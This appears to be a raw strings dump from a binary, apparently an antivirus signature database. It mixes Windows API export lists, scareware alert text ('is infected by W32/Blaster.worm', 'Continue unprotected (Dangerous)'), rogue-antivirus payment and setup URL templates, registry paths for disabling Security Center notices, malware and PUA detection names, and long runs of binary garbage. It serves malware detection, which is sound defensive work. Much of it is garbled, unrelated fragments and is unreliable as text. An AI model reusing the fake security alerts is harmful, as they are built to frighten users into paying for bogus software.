PersonalTrustDBDialogExWTHelperCertCheckValidSignatureWTHelperCertIsSelfSignedWTHelperGetProvCertFromChainWTHelperGetProvPrivateDataFromChainWTHelperGetProvSignerFromChainWTHelperProvDataFromStateDataWinVerifyTrustWinVerifyTrustExWintrustAddActionIDWintrustAddDefaultForUsageWintrustGetDefaultForUsageWintrustGetRegPolicyFlagsWintrustLoadFunctionPointersWintrustRemoveActionIDWintrustSetRegPolicyFlags l: low has detected a leak of your files though the Internet. 7 has detected a leak of your files though the Internet. items are critical privacy compromising content 0 items are critical privacy compromising content items is medium privacy threats items is medium privacy threats is infected by W32/Blaster.worm is infected by W32/Blaster.wormxh Windows recommend Activate %1 OBNOVIT - !? avp:scan%152 NisSrv.exemsseces.exe No, Continue unprotected (Dangerous) %1 right now and stop worrying about PC security forever! Please write it for future using and support requests. Some of secure components inactive. Please check. Some of secure components inactive. Please check.xl a.innerText = \"Click here to get \" + product_name + \" License\" >a.innerText = \"Click here to get \" + product_name + \" License\" Windows has detected installed antispyware softwares on your computer. Greetings to Sunbelt - only they know my name! ;) 1Greetings to Sunbelt - only they know my name! ;) kernu el32u .dllu VirusProtText WinSecurityCenter.cpl Mystic Compressor Your system might be at risk now. !Your system might be at risk now.x Control Panel\\don't load scui.cpl SOFTWARE\\Microsoft\\Security Center\\AntiVirusDisableNotify 9SOFTWARE\\Microsoft\\Security Center\\AntiVirusDisableNotify /pp/?id= \t/pp/?id= fstart Windows_Updates nAgent.arpt is a Spyware program that records keystrokes \\Do you want to block this suspicious software?x \\_scui.cpl\" /reg_product.php?skey=%s&hs=%s /reg_product.php?email=%s&key=%s&hs=%s dialog-spywarescan dialog-antispyware dialog-firewall dialog-privacy static-infections_found HTML_SPYWARESCAN_DIALOG Are you sure you want to exit the WinAntiMalware? 2Are you sure you want to exit the WinAntiMalware? Are you sure you want to leave the options without saving? ;Are you sure you want to leave the options without saving? /daily.cvd /main.cvd /Antivirus PC 2009.lnk avpc2009.exe /data/self.hdb /data/self.hdbx wscui_class \" /GAV Continue surfing without any security measures (DANGEROUS) System security ALERT! Attention: DANGER! fucking fuck ..x\t Welcome to installer Win Defender Defender 2012 Uninstall @$&%04\\defender.exe Spyware Protection Welcome to the WindowsDefender Setup Wizard +Welcome to the WindowsDefender Setup Wizard Welcome to installer Security Essentials Welcome to installer Secure Essentials Secure Essentials is breaking Welcome to installer dfghfdghfdghg Install dfghfdghfdghg is breaking Welcome to installer Windows 7 Install Windows 7 is breaking Antispyware Protection.lnk Antispyware Protection.lnkx_ &/installed.php?id= /tnx.php?mail= and UNWANTED files on your computer! Security Alert! ,Protection level: LOW P.php?version=%aff%&email=%email%&os=%os% @/payment/index.php?version=%aff% iexplore.exe;calc.exe;WinWord.exe tEmail-Worm.VBS.Peach#This internet worm spreads via e-mailx{ WIN32.Annex.Worm Spyware alarm! All malware objects was remove <title> Reported Insecure Browsing: Navigation blocked Are you sure to stay unprot Are you really want to keep infe Windows hangovers and crashes without limitations urn firewall on, so that no one could attack it from the Interne >Insecure Internet activity. Threat of virus attack< Advanced Security Tool 20 return add('Continue to this website unprotected (not recommended).')\"x {427dbde0-7799-4611-9789-deb36156d1ad} &{427dbde0-7799-4611-9789-deb36156d1ad} http://%s/httpss/setup.php?action=4&mk=%s&aid=%s 0http://%s/httpss/setup.php?action=4&mk=%s&aid=%s /setup.php?v=%s&action=%s&mk=%s&aid=%s &/setup.php?v=%s&action=%s&mk=%s&aid=%s http://www.%domain%/buy/ RunDll32.exe shell32.dll,Control_RunDLL wscui.cpl 1RunDll32.exe shell32.dll,Control_RunDLL wscui.cpl \\buypage.html Are you wish to keep this ILLEGAL FILE on your computer? The \"viral code\" (1436 B) will receive the execution inside the infected file. Pigax.gen.a!921565b7f6 %s/buy/index/%s/%s Your computer WILL BE DISCONNECTED FORM INTERNET BECAUSE SPAMMING OTHER PCs %s/httpss/setup.php?v=%d&action=4&mk=%s&aid=%s .%s/httpss/setup.php?v=%d&action=4&mk=%s&aid=%s %s%s?p= &aid=%s {FBD69E67-C708-47be-B49F-33D4200B818C} &{FBD69E67-C708-47be-B49F-33D4200B818C} &/buy/?affiliate_id= entry point its also repleaced with polymorphics sequences http://%s%s?p=2&aid=% s&orderid=%d&key=%s By destroying the BIOS many times you end up buying 3By destroying the BIOS many times you end up buying CAttackDlg securitycenter.exe aler3fa.exe http://www.[:||||:]/buy/ %s\\How to Activate %s.lnk proxy-relay trojan server with new and danger \"SpamBots\". 9proxy-relay trojan server with new and danger \"SpamBots\". (ISP) for YOU personal computer is on some major blackl 7(ISP) for YOU personal computer is on some major blackl Hprivate data steal such as passwords~ i\\>#0< zi\\>#0< @)zI$ C !~4 C Mx@ 9r++ iuJp`% z$/4Y @#!*Y vEE)^ +9y,b )--s& c37- O _9X-z J2,O` h4yw{SO ?\"i4c uLH6G +,B4= Ry2g> wFCmcC Xz'G HiD>h /\\jPO T*1Y5Q t_TV% WW}Qd X$>i [Jp/, 3v}2u 8=J*$ [CIFe< $ .textB .rsrc0 @@.relocH @BFe.a dxtrans.pdb [ paD ?^' / u=cG1< ^,48a+6 ?oGC[ %I fu O<`qM .rqK 'c\\*< 3dixB Y#Vso `5[Zl )1o%vPP Dn6 L ne>WJZ9ua bkqH` 6&~?! .\"& .\"EW0 .\"EW0 .#Xp &|\tgz-T 88n 8 {LP@}% `Rs CO p.9;f .(u> 'q .x^ z Y {4 &\\XU# .-_s ..%B1WPj[ ..%B1WPj[ ..|c 01JH/ .1NW o_Yd/ .6?H .;I- 7Pj6L f2|cnS Yhkm .A6e -\\XU ! 6E|t .E:; \\IV>L3J .KgDh) .KgDh) 12;!E .LMmc .LMmc $K)rN .Ph} $eM3RL S+S7'+ @rEx} .U5dw .U5dw u&_)< wR`]Z *k 7+ .^K3 oS ( .^e )G .^e )G .ai;:n_sTM .ai;:n_sTM chR|8* rG-60 .jg$ .k\\M .nD}] .nD}] .pLb9 .pLb9 .qxYK .qxYK 'IZ+: R[FDu -b2Uk ^ilN\\qj .{RMj .{RMj .|.@> .|.@> $22^#nx 4c.Q s ,? F L@%2SYgX>HFB:0a o8}dw $gwUL 1,?,[ ju50Ew .=K:O UA~OW{ GG_cRB ce+Tg` W9~4v7 :w 3T? 9pnCu #/~!l Wx T= 1ba782ac9e312 1ba782ac9e312Flags1 Kryptomix KryptomixIncludesGenericRepairHelpers 2778e4376ba1 28616b746fbc no_boundimport no_debug \tno_debug 318967915fd3 45403b94d52d 6978dbed1f92 Lowfi:HSTR:BrowserModifier:Win32/AOLToolbarOld /Lowfi:HSTR:BrowserModifier:Win32/AOLToolbarOld 6b785bc5765c ALF:Trojan:Win32/IcedId.PJ!MTB 75405d2675d7 7c614fa2217d 8761305e3344 93615ed71370 a361528b9faf b5b31905a562 \\processhacker.exe b678a7e14c2a b778e7d98d37 bb78f35eb449 blackbone e778379ec799 df787459af55 df787459af55Flags1 10378cc414e3d 10378dae3d7fc 105787e0051a4 106784ff537ff 10761db920abf 10778775bb046 10778a9cd6d4e 108781484b368 10d78c8f80e7c 10f6113988095 1117884c24450 113b33993c5a6 115787abd968d 11978e4104d9d 119b37e72e2e2 11b610957b20f 11e61fc68e6da 11e78207eb9da 125784ff62afa 12f7858b30d7d 12f78a60080e5 13378825848ea 13d78001bfc13 13d789e721ccf 14178434c4e4c 155782638a286 15578bcf8f6be 1597882c17022 15d783ad11a47 15d78e7eaf812 16178e217efc1 16778141c81d8 16978cdd9b282 16a781730aa64 173784f0ba06f 17b784ca20326 17d7879ea4953 17f7802d2a85f 17f788c71c4fb t6Ht Ht Hu7 t5Hug Fj=Xf Nj=AXf Nj AXf PPPPP u#F; u j X_^[ Y_^[ sVC20XC00U tLxXj sYY^] SVWUj SVWUjjh8O t ]_^[ ;t$,v- @$ tT Y_^[ Y_^[ sjh\\W Y_^[ \\z\\X[P\\@\\ ZH[8[,[ Zf\\4\\ GetSystemTimeAsFileTimew LocalAlloc{ LocalFree~ LocalReAllocQ GetLastErrorKERNEL32.dll memset- memcpyntdll.dll RegEnumValueW ADVAPI32.DLL RegQueryInfoKeyWADVAPI32.DLL VirtualQuery VirtualQueryF TerminateProcessS SetUnhandledExceptionFilter3c.a 4/4X4 5*5/545[5t5 6B6G6e6 7#7(787=7R7W7g7 7>8N8l8q8 94999>9Z9 :.:3:@:[:v: ;*;/;T;Y;^;n;~; <&<6<n< ? ?%?*?a? ?G@c@p@ A\"ADAIAhA B*B6BMBrB BC:C?COC C+DcDhDmDrD ECEHEhEmE J;JKJ[JkJ{JXLvL J KFKSKcK K\"h;hQhjh i:ibi i j$j=jNjcjxj k0kGkfk~k l5lIlnl m#m<mWmlm~m n7nQnen o1oHo]o p p5pHp[pup q9q^qxq r r/rKrer}r f5sWsls t-tAtStgt{t u'u>uOuau}u v!v<vUvjv{v f=wKwXwhw x+x@xUxextx y2yFyayzy z4zGzez~z {<{O{q{ |(|?|[| g&g~| |?gdg !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqstuvwxyz{|}~ CRYPT32.DLL CreateFileU CryptLoadSip CryptSignHashU CryptVerifySignatureU I_CertProtectFunction I_CertSrvProtectFunction I_CryptGetDefaultCryptProvForEncrypt I_CryptGetLruEntryIdentifier I_CryptGetTls RegCreateHKCUKeyExU RegCreateKeyExU RegDeleteValueU RegEnumValueU RegOpenHKCUKeyExU RegOpenKeyExU RegQueryInfoKeyU RegQueryValueExU RegSetValueExU CertAddCRLContextToStore CertAddCRLLinkToStore CertAddCTLContextToStore CertAddCTLLinkToStore CertAddCertificateContextToStore CertAddCertificateLinkToStore CertAddEncodedCRLToStore CertAddEncodedCTLToStore CertAddEncodedCertificateToStore CertAddEncodedCertificateToSystemStoreA CertAddEncodedCertificateToSystemStoreW CertAddEnhancedKeyUsageIdentifier CertAddSerializedElementToStore CertAddStoreToCollection CertAlgIdToOID CertCloseStore CertCompareCertificate CertCompareCertificateName CertCompareIntegerBlob CertComparePublicKeyInfo CertControlStore CertCreateCRLContext CertCreateCTLContext CertCreateCTLEntryFromCertificateContextProperties CertCreateCertificateChainEngine CertCreateCertificateContext CertCreateContext CertCreateSelfSignCertificate CertDeleteCRLFromStore CertDeleteCTLFromStore CertDeleteCertificateFromStore CertDuplicateCRLContext CertDuplicateCTLContext CertDuplicateCertificateChain CertDuplicateCertificateContext CertDuplicateStore CertEnumCRLContextProperties CertEnumCRLsInStore CertEnumCTLContextProperties CertEnumCTLsInStore CertEnumCertificateContextProperties CertEnumCertificatesInStore CertEnumPhysicalStore CertEnumSubjectInSortedCTL CertEnumSystemStore CertEnumSystemStoreLocation CertFindAttribute CertFindCRLInStore CertFindCTLInStore CertFindCertificateInCRL CertFindCertificateInStore CertFindChainInStore CertFindExtension CertFindRDNAttr CertFindSubjectInCTL CertFindSubjectInSortedCTL CertFreeCRLContext CertFreeCTLContext CertFreeCertificateChain CertFreeCertificateChainEngine CertFreeCertificateContext CertGetCRLContextProperty CertGetCRLFromStore CertGetCTLContextProperty CertGetCertificateChain CertGetCertificateContextProperty CertGetEnhancedKeyUsage CertGetIntendedKeyUsage CertGetIssuerCertificateFromStore CertGetNameStringA CertGetNameStringW CertGetPublicKeyLength CertGetStoreProperty CertGetSubjectCertificateFromStore CertGetValidUsages CertIsRDNAttrsInCertificateName CertIsValidCRLForCertificate CertNameToStrA CertNameToStrW CertOIDToAlgId CertOpenStore CertOpenSystemStoreA CertOpenSystemStoreW CertRDNValueToStrA CertRDNValueToStrW CertRegisterPhysicalStore CertRegisterSystemStore CertRemoveEnhancedKeyUsageIdentifier CertRemoveStoreFromCollection CertResyncCertificateChainEngine CertSaveStore CertSerializeCRLStoreElement CertSerializeCTLStoreElement CertSerializeCertificateStoreElement CertSetCRLContextProperty CertSetCTLContextProperty CertSetCertificateContextPropertiesFromCTLEntry CertSetCertificateContextProperty CertSetEnhancedKeyUsage CertSetStoreProperty CertStrToNameA CertStrToNameW CertUnregisterPhysicalStore CertUnregisterSystemStore CertVerifyCRLRevocation CertVerifyCRLTimeValidity CertVerifyCTLUsage CertVerifyCertificateChainPolicy CertVerifyRevocation CertVerifySubjectCertificateContext CertVerifyTimeValidity CertVerifyValidityNesting CryptAcquireCertificatePrivateKey CryptBinaryToStringA CryptBinaryToStringW CryptCloseAsyncHandle CryptCreateAsyncHandle CryptCreateKeyIdentifierFromCSP CryptDecodeMessage CryptDecodeObject CryptDecodeObjectEx CryptDecryptAndVerifyMessageSignature CryptDecryptMessage CryptEncodeObject CryptEncodeObjectEx CryptEncryptMessage CryptEnumKeyIdentifierProperties CryptEnumOIDFunction CryptEnumOIDInfo CryptExportPKCS8 CryptExportPublicKeyInfo CryptExportPublicKeyInfoEx CryptFindCertificateKeyProvInfo CryptFindLocalizedName CryptFindOIDInfo CryptFormatObject CryptFreeOIDF CRYPT32.DLLCreateFileUCryptLoadSipCryptSignHashUCryptVerifySignatureUI_CertProtectFunctionI_CertSrvProtectFunctionI_CryptGetDefaultCryptProvForEncryptI_CryptGetLruEntryIdentifierI_CryptGetTlsRegCreateHKCUKeyExURegCreateKeyExURegDeleteValueURegEnumValueURegOpenHKCUKeyExURegOpenKeyExURegQueryInfoKeyURegQueryValueExURegSetValueExUCertAddCRLContextToStoreCertAddCRLLinkToStoreCertAddCTLContextToStoreCertAddCTLLinkToStoreCertAddCertificateContextToStoreCertAddCertificateLinkToStoreCertAddEncodedCRLToStoreCertAddEncodedCTLToStoreCertAddEncodedCertificateToStoreCertAddEncodedCertificateToSystemStoreACertAddEncodedCertificateToSystemStoreWCertAddEnhancedKeyUsageIdentifierCertAddSerializedElementToStoreCertAddStoreToCollectionCertAlgIdToOIDCertCloseStoreCertCompareCertificateCertCompareCertificateNameCertCompareIntegerBlobCertComparePublicKeyInfoCertControlStoreCertCreateCRLContextCertCreateCTLContextCertCreateCTLEntryFromCertificateContextPropertiesCertCreateCertificateChainEngineCertCreateCertificateContextCertCreateContextCertCreateSelfSignCertificateCertDeleteCRLFromStoreCertDeleteCTLFromStoreCertDeleteCertificateFromStoreCertDuplicateCRLContextCertDuplicateCTLContextCertDuplicateCertificateChainCertDuplicateCertificateContextCertDuplicateStoreCertEnumCRLContextPropertiesCertEnumCRLsInStoreCertEnumCTLContextPropertiesCertEnumCTLsInStoreCertEnumCertificateContextPropertiesCertEnumCertificatesInStoreCertEnumPhysicalStoreCertEnumSubjectInSortedCTLCertEnumSystemStoreCertEnumSystemStoreLocationCertFindAttributeCertFindCRLInStoreCertFindCTLInStoreCertFindCertificateInCRLCertFindCertificateInStoreCertFindChainInStoreCertFindExtensionCertFindRDNAttrCertFindSubjectInCTLCertFindSubjectInSortedCTLCertFreeCRLContextCertFreeCTLContextCertFreeCertificateChainCertFreeCertificateChainEngineCertFreeCertificateContextCertGetCRLContextPropertyCertGetCRLFromStoreCertGetCTLContextPropertyCertGetCertificateChainCertGetCertificateContextPropertyCertGetEnhancedKeyUsageCertGetIntendedKeyUsageCertGetIssuerCertificateFromStoreCertGetNameStringACertGetNameStringWCertGetPublicKeyLengthCertGetStorePropertyCertGetSubjectCertificateFromStoreCertGetValidUsagesCertIsRDNAttrsInCertificateNameCertIsValidCRLForCertificateCertNameToStrACertNameToStrWCertOIDToAlgIdCertOpenStoreCertOpenSystemStoreACertOpenSystemStoreWCertRDNValueToStrACertRDNValueToStrWCertRegisterPhysicalStoreCertRegisterSystemStoreCertRemoveEnhancedKeyUsageIdentifierCertRemoveStoreFromCollectionCertResyncCertificateChainEngineCertSaveStoreCertSerializeCRLStoreElementCertSerializeCTLStoreElementCertSerializeCertificateStoreElementCertSetCRLContextPropertyCertSetCTLContextPropertyCertSetCertificateContextPropertiesFromCTLEntryCertSetCertificateContextPropertyCertSetEnhancedKeyUsageCertSetStorePropertyCertStrToNameACertStrToNameWCertUnregisterPhysicalStoreCertUnregisterSystemStoreCertVerifyCRLRevocationCertVerifyCRLTimeValidityCertVerifyCTLUsageCertVerifyCertificateChainPolicyCertVerifyRevocationCertVerifySubjectCertificateContextCertVerifyTimeValidityCertVerifyValidityNestingCryptAcquireCertificatePrivateKeyCryptBinaryToStringACryptBinaryToStringWCryptCloseAsyncHandleCryptCreateAsyncHandleCryptCreateKeyIdentifierFromCSPCryptDecodeMessageCryptDecodeObjectCryptDecodeObjectExCryptDecryptAndVerifyMessageSignatureCryptDecryptMessageCryptEncodeObjectCryptEncodeObjectExCryptEncryptMessageCryptEnumKeyIdentifierPropertiesCryptEnumOIDFunctionCryptEnumOIDInfoCryptExportPKCS8CryptExportPublicKeyInfoCryptExportPublicKeyInfoExCryptFindCertificateKeyProvInfoCryptFindLocalizedNameCryptFindOIDInfoCryptFormatObjectCryptFreeOIDF \\system32\\dsquery.dll Msoftware\\classes\\clsid\\{6e65cbc0-926d-11d0-8e27-00c04fc99dcf}\\inprocserver32 @C:\\WINDOWS\\system32\\netcfgx.dll Msoftware\\classes\\clsid\\{d82be2b0-5764-11d0-a96e-00c04fd705a2}\\inprocserver32 @c:\\windows\\system32\\SHELL32.dll Msoftware\\classes\\clsid\\{d969a300-e7ff-11d0-a93b-00a0c90f2719}\\inprocserver32 Msoftware\\classes\\clsid\\{dde5783a-88b9-11d2-84ad-00c04fa31a86}\\inprocserver32 @c:\\windows\\system32\\dsquery.dll Msoftware\\classes\\clsid\\{de4874d1-feee-11d1-a0b0-00c04fa31a86}\\inprocserver32 NSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft Security Client Publisher,Microsoft Corporation Fclsid\\{424b71af-0695-11d2-a484-00c04f8efb69}\\versionindependentprogid PDXImageTransform.Microsoft.CrRadialWipe 1SOFTWARE\\Microsoft\\Internet Explorer\\Transitions \tPageBackjprogid:DXImageTransform.Microsoft.Fade(Duration=0.4) MSOFTWARE\\Classes\\CLSID\\{06A03425-C9EB-11d2-8CAA-0080C739E3E0}\\InprocServer32 Bc:\\windows\\System32\\mmcshext.dll MSOFTWARE\\Classes\\clsid\\{0be35204-8f91-11ce-9de3-00aa004bb851}\\inprocserver32 BC:\\Windows\\system32\\oleaut32.dll Msoftware\\classes\\clsid\\{db5d1ff4-09d7-11d1-bb10-00c04fc9a3a3}\\inprocserver32 BC:\\WINDOWS\\system32\\filemgmt.dll Msoftware\\classes\\clsid\\{db5d1ff5-09d7-11d1-bb10-00c04fc9a3a3}\\inprocserver32 Msoftware\\classes\\clsid\\{dbfca500-8c31-11d0-aa2c-00a0c92749a3}\\inprocserver32 Bc:\\windows\\System32\\dmdskmgr.dll Msoftware\\classes\\clsid\\{dd313e04-feff-11d1-8ecd-0000f87a470c}\\inprocserver32 Bc:\\windows\\system32\\browseui.dll NSYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E96F-E325-11CE-BFC1-08002BE10318} @Mice and other pointing devices Dsoftware\\classes\\typelib\\{3f4daca7-160d-11d2-a8e9-00104b365c9f}\\1.0 VMicrosoft VBScript Regular Expressions 1.0 JSOFTWARE\\Classes\\clsid\\{30d02401-6a81-11d0-8274-00c04fd5ae38}\\defaulticon J%SystemRoot%\\system32\\browseui.dll,8 Jsoftware\\classes\\clsid\\{645ff040-5081-101b-9f08-00aa002f954e}\\defaulticon J%SystemRoot%\\system32\\SHELL32.dll,31 Lsoftware\\Classes\\typelib\\{7444c709-39bf-11d1-8cd9-00c04fc29d45}\\1.0\\0\\win32 F%SystemRoot%\\system32\\cryptext.dll Lsoftware\\classes\\typelib\\{640d3148-a423-11d2-b943-00c04f79d22f}\\1.0\\0\\win32 FC:\\WINDOWS\\system32\\catsrvut.dll\\7 OSYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000 HardwareInformation.MemorySize nSOFTWARE\\Classes\\CLSID\\{083863F1-70DE-11D0-BD40-00A0C911CE86}\\Instance\\{6E8D4A20-310C-11D0-B79A-00AA003767A7} nSOFTWARE\\Classes\\CLSID\\{083863F1-70DE-11D0-BD40-00A0C911CE86}\\Instance\\{70E102B0-5556-11CE-97C0-00AA0055595A} nSOFTWARE\\Classes\\CLSID\\{083863F1-70DE-11D0-BD40-00A0C911CE86}\\Instance\\{814B9800-1C88-11D1-BAD9-00609744111A} nSOFTWARE\\Classes\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance\\{33FACFE0-A9BE-11D0-A520-00A0D10129C0} nSOFTWARE\\Classes\\clsid\\{da4e3da0-d07d-11d0-bd50-00a0c911ce86}\\instance\\{083863f1-70de-11d0-bd40-00a0c911ce86} nsoftware\\classes\\clsid\\{083863f1-70de-11d0-bd40-00a0c911ce86}\\instance\\{6a08cf80-0e18-11cf-a24d-0020afd79767} oCLSID\\{098f2470-bae0-11cd-b579-08002b30bfeb}\\PersistentAddinsRegistered\\{89bcb740-6119-101a-bcb7-00dd010655af} !HARDWARE\\DEVICEMAP\\KeyboardClass \\Device\\KeyboardClass0r\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Services\\Kbdclass MSOFTWARE\\Classes\\CLSID\\{1438E821-B6D2-11D0-8D86-00C04FD6202B}\\InprocServer32 F%SystemRoot%\\system32\\msoeacct.dll MSOFTWARE\\Classes\\clsid\\{fd853ce7-7f86-11d0-8252-00c04fd85ab4}\\inprocserver32 F%SystemRoot%\\system32\\inetcomm.dll MSOFTWARE\\Classes\\clsid\\{fd853ce8-7f86-11d0-8252-00c04fd85ab4}\\inprocserver32 Msoftware\\classes\\clsid\\{fd4f53e0-65dc-11d1-ab64-00c04fd9159e}\\inprocserver32 FC:\\WINDOWS\\system32\\wbem\\ntevt.dll eSYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{0AF211EC-FE9A-4F7F-AD6C-07D5C5BACEBE} oSYSTEM\\CurrentControlSet\\Enum\\SW\\{96e080c7-143c-11d1-b40f-00a0c9223196}\\{3C0D501A-140B-11D1-B40F-00A0C9223196} <CLSID\\{228136B0-8BD3-11D0-B4EF-00A0C9138CA4}\\InprocServer32 jc:\\program files\\common files\\system\\ado\\msadomd.dll <CLSID\\{228136B8-8BD3-11D0-B4EF-00A0C9138CA4}\\InProcServer32 Jsoftware\\classes\\Interface\\{000c109b-0000-0000-c000-000000000046}\\typelib N{000C1092-0000-0000-C000-000000000046} Jsoftware\\classes\\interface\\{3050f33c-98b5-11cf-bb82-00aa00bdce0b}\\typelib N{3050F1C5-98B5-11CF-BB82-00AA00BDCE0B} Jsoftware\\classes\\interface\\{3050f357-98b5-11cf-bb82-00aa00bdce0b}\\typelib Lsoftware\\classes\\typelib\\{f618c513-dfb8-11d1-a2cf-00805fc79235}\\1.0\\0\\win32 JC:\\WINDOWS\\system32\\Com\\comadmin.dll YSYSTEM\\CurrentControlSet\\control\\safeboot\\network\\{745a17a0-74d3-11d0-b6fe-00a0c90f57da} 0Human Interface Devices ]clsid\\{083863f1-70de-11d0-bd40-00a0c911ce86}\\instance\\{129d7e40-c10d-11d0-afb9-00aa00b67a42} friendlyname DV Muxer Asoftware\\microsoft\\windows\\currentversion\\explorer\\shell folders \tprogramsRC:\\Documents and Settings\\Alan Tracey\\St ProcessorNameString`Intel(R) Xeon(R) CPU L5640 @ 2.27GHz Lsoftware\\classes\\typelib\\{5c65924b-e236-11d2-8899-00104b2afb46}\\1.0\\0\\win32 LC:\\WINDOWS\\system32\\wbem\\wbemcntl.dll Msoftware\\classes\\clsid\\{fa77a74e-e109-11d0-ad6e-00c04fd8fdff}\\inprocserver32 JC:\\WINDOWS\\system32\\wbem\\stdprov.dll <CLSID\\{10072CEC-8CC1-11D1-986E-00A0C955B42E}\\InprocServer32 n%CommonProgramFiles(x86)%\\Microsoft Shared\\VGX\\vgx.dll <CLSID\\{2048EEE6-7FA2-11D0-9E6A-00A0C9138C29}\\InprocServer32 pc:\\program files\\common files\\system\\ole db\\oledb32.dll <CLSID\\{2206CDB3-19C1-11D1-89E0-00C04FD7A829}\\InprocServer32 pC:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll =clsid\\{06210e88-01f5-11d1-b512-0080c781c384}\\\\inprocserver32 nC:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll Wsoftware\\classes\\clsid\\{98aff3f0-5524-11d0-8812-00a0c903b83c}\\versionindependentprogid :CertificateAuthority.Request =clsid\\{7C07E0D0-4418-11D2-9212-00C04FBBBFB3}\\\\InprocServer32 pC:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll Lsoftware\\classes\\typelib\\{c8b522d5-5cf3-11ce-ade5-00aa0044773d}\\1.0\\0\\win32 RC:\\Program Files\\Common Files\\System\\Ole MSOFTWARE\\Classes\\CLSID\\{101A8FB9-F1B9-11d1-9A56-00C04FA309D4}\\InprocServer32 P%ProgramFiles%\\Outlook Express\\msoe.dll nsoftware\\classes\\clsid\\{da4e3da0-d07d-11d0-bd50-00a0c911ce86}\\instance\\{083863f1-70de-11d0-bd40-00a0c911ce86} merit tSOFTWARE\\Classes\\CLSID\\{0C7FF16C-38E3-11d0-97AB-00C04FC2AD98}\\ExtendedErrors\\{C0932C62-38E5-11d0-97AB-00C04FC2AD98} tSOFTWARE\\Classes\\clsid\\{0000051a-0000-0010-8000-00aa006d2ea4}\\extendederrors\\{00000542-0000-0010-8000-00aa006d2ea4} <CLSID\\{00000100-0000-0010-8000-00AA006D2EA4}\\InprocServer32 t%CommonProgramFiles(x86)%\\Microsoft Shared\\DAO\\dao360.dll <CLSID\\{00000105-0000-0010-8000-00AA006D2EA4}\\InprocServer32 uSYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List ]clsid\\{083863f1-70de-11d0-bd40-00a0c911ce86}\\instance\\{cd8743a1-3736-11d0-9e69-00c04fd7c15b} Overlay Mixer cCLSID\\{2206CDB0-19C1-11D1-89E0-00C04FD7A829}\\ExtendedErrors\\{2206CDB3-19C1-11D1-89E0-00C04FD7A829} (MSDASC Error Lookup local appdataRC:\\Documents and Settings\\Alan Tracey\\Lo DisplayName<Microsoft Security Essentials PSOFTWARE\\Classes\\CLSID\\{00020810-0000-0000-C000-000000000046}\\PersistentHandler PSOFTWARE\\Classes\\CLSID\\{00020811-0000-0000-C000-000000000046}\\PersistentHandler PSOFTWARE\\Classes\\CLSID\\{00020820-0000-0000-C000-000000000046}\\PersistentHandler N{98de59a0-d175-11cd-a7bd-00006b8 !#PUA:ML:Blocked:Cloniuml< !#PUA:ML:Blocked:Conduitl< !#MIXED:REP:pdfforgegmbhl< !#doplik_messenger_cert8l< !#PUA:ML:Blocked:SaveNowl< !#ALF:Ransom:JS/CoinHivel< !#PUA:ML:Blocked:Solimbal< !#PUA:ML:Blocked:JooSoftl< !#PUA:ML:Blocked:DoyoAdsl< !#PUA:ML:Blocked:Tiwwterl< !#PUA:ML:Blocked:Savepopl< !#PUA:ML:Blocked:4Sharedl< !#PUA:ML:Blocked:ShopBoxl< !#PUA:ML:Blocked:Tuto4pcl< !#PUA:ML:Blocked:GameBoxl< T>fH- !#PUA:ML:Blocked:UtilTopl< !#PUA:ML:Blocked:Komodial< !#doplik_messenger_cert9l< !#PUA:ML:Blocked:Youfilel< !#PUA:ML:Blocked:PCMedicl< !#PUA:ML:Blocked:Visicoml< !#PUA:ML:Blocked:Cutwaill< !#PUA:ML:Blocked:GetClipl< !#PUA:ML:Blocked:Keypangl< !#PUA:ML:Blocked:PCCleanl< !#PUA:ML:Blocked:Conduitl= !#PUA:ML:Blocked:FeedArchl= !#PUA:ML:Blocked:Gamsoftsl= !#PUA:ML:Blocked:Bundlorel= !#PUA:ML:Blocked:Passwarel= !#PUA:ML:Blocked:SoftPulsl= !#PUA:ML:Blocked:Systweakl= !#PUA:ML:Blocked:Pacificsl= !#PUA:PoorCertRep:Blockedl= GX@Bb !#PUA:ML:Blocked:PcMightyl= !#PUA:ML:Blocked:Vittalial= !#ALF:Trojan:MacOS/Ymaccol= !#PUA:ML:Blocked:Framefoxl= !#App:Casino:CasinoOnlinel= \"?p$s !#PUA:ML:Blocked:RuKometal= !#PUA:ML:Blocked:Toptoolsl= !#ALFPER:ML:Staged:Mikatzl= !#PUA:ML:Blocked:ExtenBrol= !#ALFPER:ML:Staged:Bankerl= !#PUA:ML:Blocked:Bang5mail= y!]H5Q !#PUA:ML:Blocked:Montieral= !#PUA:ML:Blocked:GibMedial= !#MIXED:REP:smartprojectsl= !#PUA:ML:Blocked:Gabpathsl= !#MIXED:REP:jcglobewayincl= !#PUA:ML:Blocked:Catalinal= !#PUA:ML:Blocked:ManFlashl= !#PUA:ML:Blocked:TopMoxiel= !#PUA:ML:Blocked:Linkularl= xUr], Hr1Tr !#PUA:ML:Blocked:SoftBasel= UUDQ} !#PUA:Block:NiceHashMinerl= !#PUA:ML:Blocked:Comscorel= !#ALFPER:ML:Staged:Ursnifl= !#PUA:ML:Blocked:ThemedXPl= !#PUA:IRSH:Block:Systweakl= !#PUA:ML:Blocked:PayByAdsl= !#PUA:ML:Blocked:LTLoggerl= !#ALF:AnyDeskInside.ST001l= %VPVN). !#PUA:ML:Blocked:iTorrentl= &a,;K !#PUA:ML:Blocked:Aquariusl= !#ALFPER:ML:Staged:Bancosl= !#PUA:ML:Blocked:uTorrentl= !#PUA:ML:Blocked:HideBaidl= !#PUA:ML:Blocked:Trymedial= !#PUA:ML:Blocked:MediaGetl= !#PUA:ML:Blocked:DeskIconl= !#MIXED:REP:myheritageltdl= !#PUA:Block:DownloadGuidel= !#PUA:ML:Blocked:Haocodesl= xV\"XTP !#PUA:ML:Blocked:Findwidel= !#PUA:ML:Blocked:ShopHomel= !#PUA:ML:Blocked:383Medial= !#PUA:ML:Blocked:BeFrugall= !#PUA:ML:Blocked:BTmagnatl= 